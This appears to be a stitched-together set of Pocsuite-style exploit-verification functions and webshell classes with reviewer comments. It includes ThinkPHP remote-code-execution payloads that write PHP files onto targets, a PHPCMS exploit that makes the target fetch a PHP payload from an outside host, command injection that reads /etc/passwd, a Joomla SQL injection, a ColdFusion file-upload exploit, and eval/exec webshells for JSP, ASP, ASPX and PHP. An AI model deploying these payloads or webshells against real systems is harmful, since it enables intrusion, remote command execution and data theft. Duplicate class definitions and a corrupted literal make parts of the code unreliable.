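def _verify(self):
    """Verify mode: register a member whose profile content embeds a remote
    image URL so the target fetches and stores it, then look for the stored
    copy's path in the response and report it as a webshell.

    Returns ``self.parse_attack(result)``; ``result['VerifyInfo']`` is only
    populated when the registration response contains a stored-file path.
    """
    result = {}
    url = self.url + "/index.php?m=member&c=index&a=register&siteid=1"
    username = randomStr(6)
    password = randomStr(6, '1234567890')
    # NOTE(review): the "******" / "*****@*****.**" values below look
    # redacted. As written, %-formatting a literal that has no conversion
    # specifier raises TypeError; they were presumably "%s"-style templates.
    data = {
        "siteid": "1",
        "modelid": "1",
        "username": "******" % (username),
        "password": "******" % (password),
        "email": "*****@*****.**" % (username),
        # The target downloads this file itself. It lives on a third-party
        # host, so every run depends on (and discloses the target to) that
        # host -- serve a copy you control instead.
        "info[content]": "<img src=http://pocsuite.org/include_files/php_attack.txt?.php#.jpg> ",
        "dosubmit": "1",
        "protocol": "",
    }
    # Raw string with an escaped dot: the previous ".php" let "." match any
    # character instead of a literal period.
    match = r"img src=(.+?)(/[0-9]{4}/[0-9]{4}/)([0-9]+?)\.php"
    resp = req.post(url, data=data)
    shell = re.findall(match, resp.text)
    if shell:
        # Only index the match list when there is a match: the previous
        # unconditional shell[0] raised IndexError on a non-vulnerable host.
        shellinfo = ''.join(shell[0]) + ".php"
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = self.url
        shell_resp = req.get(shellinfo)
        if shell_resp.status_code == 200:
            result['VerifyInfo']['webshell'] = shellinfo
    # NOTE(review): sibling verify methods return parse_output(); confirm
    # which hook this framework version expects.
    return self.parse_attack(result)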
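def _verify(self):
    """Verify mode for a ThinkPHP-style RCE: ask the target to write a small
    PHP file containing a random marker, then fetch that file and look for
    the marker in its body.

    Returns ``self.parse_output(result)``; ``result['VerifyInfo']`` is
    ``"success"`` when either payload produced a readable marker file.

    Side effect on the target: ``<verify_filename>.php`` is written via
    file_put_contents and is NOT removed afterwards -- clean up after a run.
    """
    result = {}
    parts = urlparse.urlparse(self.url)
    if parts.port is None:
        # Add the default port to the netloc rather than to the end of the
        # string: "url + ':80'" broke any URL that carried a path.
        base_url = parts._replace(netloc=parts.netloc + ":80").geturl()
    else:
        base_url = self.url
    verify_str = randomStr(6)
    verify_filename = randomStr(3)
    verify_url = urlparse.urljoin(base_url, verify_filename + ".php")

    def vul_check(payload):
        """Send one payload, then return the body text of the marker file."""
        req.get(urlparse.urljoin(base_url, payload))
        # Compare against .text: returning the Response object made
        # `verify_str in ...` iterate body chunks and compare them whole,
        # never as a substring search.
        return req.get(verify_url).text

    # Every backslash is doubled so it reaches the target literally; the
    # previous "\d" was an invalid-escape sequence, not an intended escape.
    payload_list = [
        "index.php?s=index/think\\app/invokefunction&function=call_user_func_array"
        "&vars[0]=file_put_contents&vars[1][]={}.php&vars[1][]=<?php echo '{}';?>"
        .format(verify_filename, verify_str),
        "index.php?s=index/\\think\\template\\driver\\file/write"
        "?cacheFile={}.php&content=<?php echo '{}';?>"
        .format(verify_filename, verify_str),
    ]
    if any(verify_str in vul_check(x) for x in payload_list):
        result['VerifyInfo'] = "success"
    return self.parse_output(result)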
class JspShell(Webshell):
    """JSP command shell plus its liveness check.

    ``_content`` is a JSP page template: ``{0}`` and the doubled braces are
    left for a later ``str.format`` (presumably with ``_password``), so the
    braces reach the page as single ``{``/``}``. Requesting the page with
    ``?check=1`` (``_check_data``) makes it print ``202c<keyword>4b70``,
    which is the value ``_keyword`` holds after its final reassignment.
    """
    # Raw random marker; embedded in the page source first, wrapped below.
    _keyword = randomStr(20)
    # Notes on the page text itself:
    #  - the gate parameter is "{0}" but the command is read from "cmd", so
    #    both must be present in the request for anything to run;
    #  - `os` (the process stdin) is obtained but never used;
    #  - only stdout is read (getInputStream); stderr and the exit status are
    #    never collected, so a failing command prints nothing;
    #  - NOTE(review): Runtime.exec(String) runs without a shell, so pipes,
    #    redirects and quoting in "cmd" are not interpreted -- confirm this
    #    matches what callers send.
    _content = '<%@ page import="java.util.*,java.io.*" %>\n' \
               '<%@ page import="java.io.*"%>\n' \
               '<%@ page import="java.util.*"%>\n' \
               '<%\n' \
               'if (request.getParameter("check") == "1")\n' \
               ' out.println("202cTEST4b70".replace("TEST","' + _keyword + '"));\n' \
               'if (request.getParameter("{0}") != null)\n' \
               '{{\n' \
               ' Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));\n' \
               ' OutputStream os = p.getOutputStream();\n' \
               ' InputStream in = p.getInputStream();\n' \
               ' DataInputStream dis = new DataInputStream(in);\n' \
               ' String disr = dis.readLine();\n' \
               ' while ( disr != null)\n' \
               ' {{\n' \
               ' out.println(disr);\n' \
               ' disr = dis.readLine();\n' \
               ' }}\n' \
               '\n}}' \
               '%>\n'
    _password = '******'
    # Query string sent to trigger the marker branch above.
    _check_data = {'check': '1'}
    # Marker the checker searches for; built from the raw keyword used above.
    _keyword = '202c%s4b70' % _keyword
class AspShell(Webshell):
    """Classic ASP eval shell plus its liveness check.

    ``_content`` keeps a ``{0}`` placeholder for the request parameter name
    (filled in later, presumably with ``_password``). ``_check_statement`` is
    the VBScript the checker sends to make the page echo ``202c<keyword>4b70``,
    which is what ``_keyword`` holds after its final reassignment.
    """
    _keyword = randomStr(20)
    _password = '******'
    _content = '<%eval request("{0}")%>'
    # The marker is assembled on the server from "202cTEST4b70", so the final
    # marker string never appears verbatim in the statement.
    _check_statement = 'Response.Write(Replace("202cTEST4b70","TEST","{0}"))'.format(_keyword)
    _keyword = '202c{0}4b70'.format(_keyword)
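def _verify(self):
    """Verify mode: run ``echo <marker>`` through ``self.run_cmd`` and, if the
    marker comes back, record the target plus the contents of /etc/passwd
    and /etc/hosts in ``result['VerifyInfo']``.

    Side effects: ``self.raw_url`` keeps the URL as given and ``self.url`` is
    rewritten to ``scheme://host[:port]`` (path and query dropped) before any
    command is sent. Errors raised by ``run_cmd`` are swallowed so an
    unreachable or non-vulnerable target yields an empty result.

    Returns ``self.parse_output(result)``.
    """
    result = {}
    self.raw_url = self.url
    parsed = urlparse.urlparse(self.url)
    host, port, scheme = parsed.hostname, parsed.port, parsed.scheme
    if scheme == "https":
        # Keep an explicit port (e.g. :8443). Previously https always
        # dropped it, so https://host:8443 was silently probed on 443.
        if port is None:
            self.url = "%s://%s" % (scheme, host)
        else:
            self.url = "%s://%s:%d" % (scheme, host, port)
    else:
        self.url = "%s://%s:%s" % (scheme, host, "80" if port is None else str(port))
    try:
        flag = randomStr(10)
        # ${IFS} stands in for a space and the /etc paths are %2f-encoded,
        # presumably to get past a whitespace/slash filter on the target.
        check = self.run_cmd("echo${IFS}" + flag).split("\n")[0]
        if flag == check:
            result["VerifyInfo"] = {}
            result["VerifyInfo"]["url"] = self.url
            # NOTE(review): the echo round-trip alone proves execution; the
            # two reads below already exfiltrate file contents in "verify"
            # mode. Keep this within what the engagement's rules allow.
            result["VerifyInfo"]["passwd"] = self.run_cmd("cat${IFS}%2fetc%2fpasswd")
            result["VerifyInfo"]["hosts"] = self.run_cmd("cat${IFS}%2fetc%2fhosts")
    except Exception:
        # Deliberate best-effort: any transport or parsing error means
        # "not verified", not a crash of the whole run.
        pass
    return self.parse_output(result)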
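def _verify(self):
    """Verify mode (raw-socket variant): deliver each payload as an HTTP/1.0
    GET over a socket to a hard-coded 127.0.0.1:8080, pad the request with
    junk, then fetch ``<verify_filename>.php`` from ``self.url`` and look for
    the random marker in its body.

    Returns ``self.parse_output(result)`` with ``result['VerifyInfo']`` set
    to ``"success"`` on a hit. Like the HTTP-client variant it leaves the
    marker file on the target.
    """
    result = {}
    parts = urlparse.urlparse(self.url)
    if parts.port is None:
        # Attach the default port to the netloc, not to the end of a URL
        # that may carry a path.
        base_url = parts._replace(netloc=parts.netloc + ":80").geturl()
    else:
        base_url = self.url
    verify_str = randomStr(6)
    verify_filename = randomStr(3)
    verify_url = urlparse.urljoin(base_url, verify_filename + ".php")

    # NOTE(review): the raw request goes to a fixed loopback address while
    # the marker is read back from self.url. That only makes sense with a
    # local listener/proxy in front of the target -- confirm before reuse.
    junk = ('testssdfsf' * 200).encode('ascii')

    def vul_check(payload):
        """Push one payload plus padding over the socket; return marker page text."""
        sock = socket.socket()
        try:
            sock.connect(("127.0.0.1", 8080))
            # sendall() instead of send(): a short write used to truncate
            # the request without any error.
            sock.sendall('GET /{} HTTP/1.0\r\n'.format(payload).encode('ascii'))
            sock.sendall(b'Host: 127.0.0.1\r\n')
            sock.sendall(b'\r\n')
            for _ in range(18):  # same 18 x 2000-byte padding as before
                sock.sendall(junk)
        finally:
            # Always release the socket, even when connect()/sendall() fail.
            sock.close()
        # Compare against the body text; the Response object is not a
        # string, so `verify_str in response` never did a substring search.
        return req.get(verify_url).text

    payload_list = [
        "index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array"
        "&vars[0]=file_put_contents&vars[1][]={}.php&vars[1][]=%3C?php%20echo%20'{}';?%3E"
        .format(verify_filename, verify_str),
        # NOTE(review): this payload writes "<php echo ..." (no "?") whereas
        # the sibling writes "<?php"; as written the file is not PHP code.
        "index.php?s=index/\\think\\template\\driver\\file/write"
        "?cacheFile={}.php&content=%3Cphp%20echo%20'{}';?%3E"
        .format(verify_filename, verify_str),
    ]
    if any(verify_str in vul_check(x) for x in payload_list):
        result['VerifyInfo'] = "success"
    return self.parse_output(result)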
class AspxVerify(VerifyShell):
    """One-shot ASPX probe: prints the marker ``202c<keyword>4b70`` and then
    deletes its own file (``Request.PhysicalPath``) so nothing is left behind.

    ``_keyword`` is first used raw inside the page and only afterwards
    wrapped into the marker string the checker searches for.
    """
    _keyword = randomStr(20)
    _content = (
        '<%@ Page Language="Jscript" ContentType="text/html" '
        'validateRequest="false" aspcompat="true"%>\n'
        '<%Response.Write("202cTEST4b70".Replace("TEST","{0}"))%>\n'
        '<%System.IO.File.Delete(Request.PhysicalPath);%>'
    ).format(_keyword)
    _keyword = '202c{0}4b70'.format(_keyword)
class AspxShell(Webshell):
    """ASPX (JScript.NET) eval shell plus its liveness check.

    ``_content`` keeps a ``{0}`` placeholder for the request item name
    (filled in later, presumably with ``_password``). ``_check_statement``
    is the JScript the checker sends to make the page echo
    ``202c<keyword>4b70``, which ``_keyword`` holds after its reassignment.
    """
    _keyword = randomStr(20)
    _password = '******'
    _content = '<%@ Page Language="Jscript"%><%eval(Request.Item["{0}"],"unsafe");%>'
    # Marker built on the server from "202cTEST4b70" so the final marker
    # string never appears verbatim in the statement.
    _check_statement = 'Response.Write("202cTEST4b70".Replace("TEST","{0}"))'.format(_keyword)
    _keyword = '202c{0}4b70'.format(_keyword)
class AspVerify(VerifyShell):
    """One-shot classic-ASP probe: prints the marker ``202c<keyword>4b70``
    and then deletes its own file via the FileSystemObject using the
    ``Path_Translated`` server variable.

    ``_keyword`` is used raw inside the page first, then wrapped into the
    marker string the checker searches for.
    """
    _keyword = randomStr(20)
    _content = (
        '<%\n'
        'Response.Write(Replace("202cTEST4b70","TEST","{0}"))\n'
        'CreateObject("Scripting.FileSystemObject").'
        'DeleteFile(Request.ServerVariables("Path_Translated"))\n'
        '%>'
    ).format(_keyword)
    _keyword = '202c{0}4b70'.format(_keyword)
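def _verify(self):
    """Verify mode: upload a small file through the ckeditor filemanager
    ``upload.cfm`` endpoint, then request it back from ``uploadedFiles/``
    and check that the random content round-trips.

    Returns ``self.parse_output(result)``; on success ``result['VerifyInfo']``
    carries the target URL and the URL of the uploaded file.

    Side effects: ``self.url`` gains ``:8500`` when no port was given, and
    the uploaded file is left on the target (nothing deletes it).
    """
    result = {}
    parts = urlparse(self.url)
    if parts.port is None:
        # Put the default port on the netloc; appending ":8500" to the whole
        # string produced "http://host/path:8500" for URLs with a path.
        self.url = parts._replace(netloc=parts.netloc + ":8500").geturl()
    url = urljoin(self.url, '/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm')
    filename = randomStr(6)
    content = randomStr(12)
    boundary = "---------------------------24464570528145"
    # NOTE(review): the filename field below reads "(unknown)" although the
    # .format(filename=...) call on it clearly expects a {filename}
    # placeholder. As written the upload name and the `filename` used for
    # the read-back URL can never agree -- looks like a corrupted literal;
    # confirm against the upstream PoC.
    data = "\r\n".join([
        "--" + boundary,
        "Content-Disposition: form-data; name=\"file\"; filename=\"(unknown)\"".format(filename=filename),
        "Content-Type: image/jpeg",
        "",
        content,
        "--" + boundary,
        "Content-Disposition: form-data; name=\"path\"",
        "",
        "we",
        "--" + boundary + "--",
        "",
    ])
    header = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36",
        # Must be the same boundary the body above is built with.
        "Content-Type": "multipart/form-data; boundary=" + boundary,
    }
    req.post(url, headers=header, data=data)
    file_path = "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/" + filename
    file_url = urljoin(self.url, file_path)
    response = req.get(file_url)
    # .text rather than .content: `str in bytes` raises TypeError on Python 3.
    if content in response.text:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = self.url
        result['VerifyInfo']['Shell'] = file_url
    return self.parse_output(result)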
class JspVerify(VerifyShell):
    """One-shot JSP probe: prints its own filesystem path, deletes itself
    from disk, then prints the marker ``202c<keyword>4b70``.

    The doubled braces around ``d.delete()`` are for a later ``str.format``
    (they reach the page as single braces). ``_keyword`` is used raw inside
    the page first and only then wrapped into the marker the checker
    searches for.
    """
    _keyword = randomStr(20)
    # NOTE(review): the delete happens before the marker is printed and its
    # result is not checked (File.delete() reports failure by return value,
    # not by throwing), so a failed delete leaves the page on the server
    # while the probe still reports success. request.getRealPath("") is also
    # a deprecated ServletRequest method -- confirm on the target container.
    _content = '<%@ page import="java.util.*,java.io.*" %>\n' \
               '<%@ page import="java.io.*"%>\n' \
               '<%@ page import="java.util.*"%>\n' \
               '<%\n' \
               'String path=request.getRealPath("")+request.getServletPath();\n' \
               'out.println(path);\n' \
               'File d=new File(path);\n' \
               'if(d.exists()){{\n' \
               ' d.delete();\n' \
               ' }}\n' \
               '%>\n' \
               '<% out.println("202cTEST4b70".replace("TEST","' + _keyword + '"));%>'
    # Marker the checker searches for; built from the raw keyword used above.
    _keyword = '202c%s4b70' % _keyword
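def _verify(self):
    """Verify mode: error-based SQL injection in the com_users notes view.

    Authenticates via ``self.get_pass`` (sibling method), then posts a
    ``filter[category_id]`` value containing ``updatexml(...)`` with the MD5
    of a random digit string. A 500 response whose body echoes that hash
    marks the target vulnerable and sets ``result['VerifyInfo']['URL']``.

    Returns ``self.parse_output(result)``.
    """
    result = {}
    joomla_session = req.session()
    self.get_pass(joomla_session)
    # Digits only: the value is spliced unquoted into md5(...) in SQL, so it
    # must remain a valid numeric literal.
    rand_str = randomStr(10, "0123456789")
    url = urljoin(self.url, '/administrator/index.php?option=com_users&view=notes')
    sqli_payload = (
        'filter[search]=&list[fullordering]=a.review_time DESC&list[limit]=20'
        '&filter[published]=1&filter[category_id]=(updatexml(2,concat(0x7e,(md5({randstr}))),0))'
    ).format(randstr=rand_str)
    r = joomla_session.post(url=url, headers=self.headers, data=sqli_payload)
    # hashlib needs bytes on Python 3 (a str argument raised TypeError
    # there); .text keeps the `in` test a str/str comparison.
    # Only 31 hash characters are compared -- presumably because the XPath
    # error text carrying 0x7e + hash is truncated; TODO confirm.
    expected = hashlib.md5(rand_str.encode('ascii')).hexdigest()[0:31]
    if r.status_code == 500 and expected in r.text:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = url
    return self.parse_output(result)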
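def _verify(self):
    """Verify mode: ThinkPHP-style captcha-route RCE check.

    Posts ``_method=__construct``, ``filter[]=system`` and the command
    ``echo <random token>`` in ``server[REQUEST_METHOD]`` to
    ``/index.php?s=captcha``. The target is recorded as vulnerable when the
    response contains both the token and the string ``'system error'``.

    Side effect: ``self.url`` has ``/index.php?s=captcha`` appended (calling
    this twice on one instance doubles the path). Returns
    ``self.parse_output(result)``.
    """
    result = {}
    self.url = self.url + '/index.php?s=captcha'
    token = randomStr()
    cmd = "echo {}".format(token)
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    exploitdata = {
        '_method': '__construct',
        'filter[]': 'system',
        'method': 'get',
        'server[REQUEST_METHOD]': cmd,
    }
    matchstring = 'system error'
    resp = req.post(self.url, data=exploitdata, headers=headers)
    # Work on .text: on Python 3 .content is bytes and `str in bytes` raises
    # TypeError, so the check could never succeed there.
    body = resp.text
    if matchstring in body.lower() and token in body:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = self.url
    return self.parse_output(result)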
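class PhpVerify(VerifyShell):
    """One-shot PHP probe: prints the MD5 of the random keyword, then unlinks
    itself so nothing is left on the server.

    Unlike the ASP/JSP probes, ``_keyword`` here stays the raw random string;
    the checker presumably looks for ``md5(_keyword)`` in the response.
    """
    _keyword = randomStr(20)
    # The keyword is now quoted. md5(<bare word>) relied on PHP's
    # undefined-constant fallback (a warning on PHP 7, an Error on PHP 8)
    # and was a parse error whenever the random string began with a digit.
    _content = "<?php var_dump(md5('{0}'));unlink(__FILE__);?>".format(_keyword)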
class PhpVerify(VerifyShell):
    """One-shot PHP probe: prints the marker ``202c<keyword>4b70`` and then
    unlinks itself so nothing is left on the server.

    ``_keyword`` is the raw random string; the marker is only ever built
    inside the page text.
    """
    _keyword = randomStr(20)
    _content = '<?php var_dump("202c%s4b70");unlink(__FILE__);?>' % _keyword
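class PhpShell(Webshell):
    """PHP ``assert()`` eval shell plus its liveness check.

    ``_content`` keeps a ``{0}`` placeholder for the request parameter name
    (filled in later, presumably with ``_password``). ``_check_statement``
    is PHP the checker sends through the shell to make it print
    ``md5(keyword)``.
    """
    _keyword = randomStr(20)
    _password = '******'
    # NOTE(review): assert() stopped evaluating string arguments in PHP 8, so
    # this shell only works on PHP <= 7 -- confirm the target version.
    _content = "<?php @assert($_REQUEST['{0}']);?>"
    # The keyword is now quoted: md5(<bare word>) was a parse error for a
    # digit-leading keyword and otherwise relied on PHP's undefined-constant
    # fallback (a warning on PHP 7, an Error on PHP 8).
    _check_statement = "var_dump(md5('{0}'));".format(_keyword)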
class PhpShell(Webshell):
    """PHP ``assert()`` eval shell whose page also prints the marker
    ``202c<keyword>4b70`` on every request.

    Here the parameter name (``_password``) is baked into the page at class
    definition time rather than left as a placeholder.
    """
    _keyword = randomStr(20)
    _password = '******'
    _content = "<?php @assert($_REQUEST['%s']);var_dump('202c%s4b70')?>" % (_password, _keyword)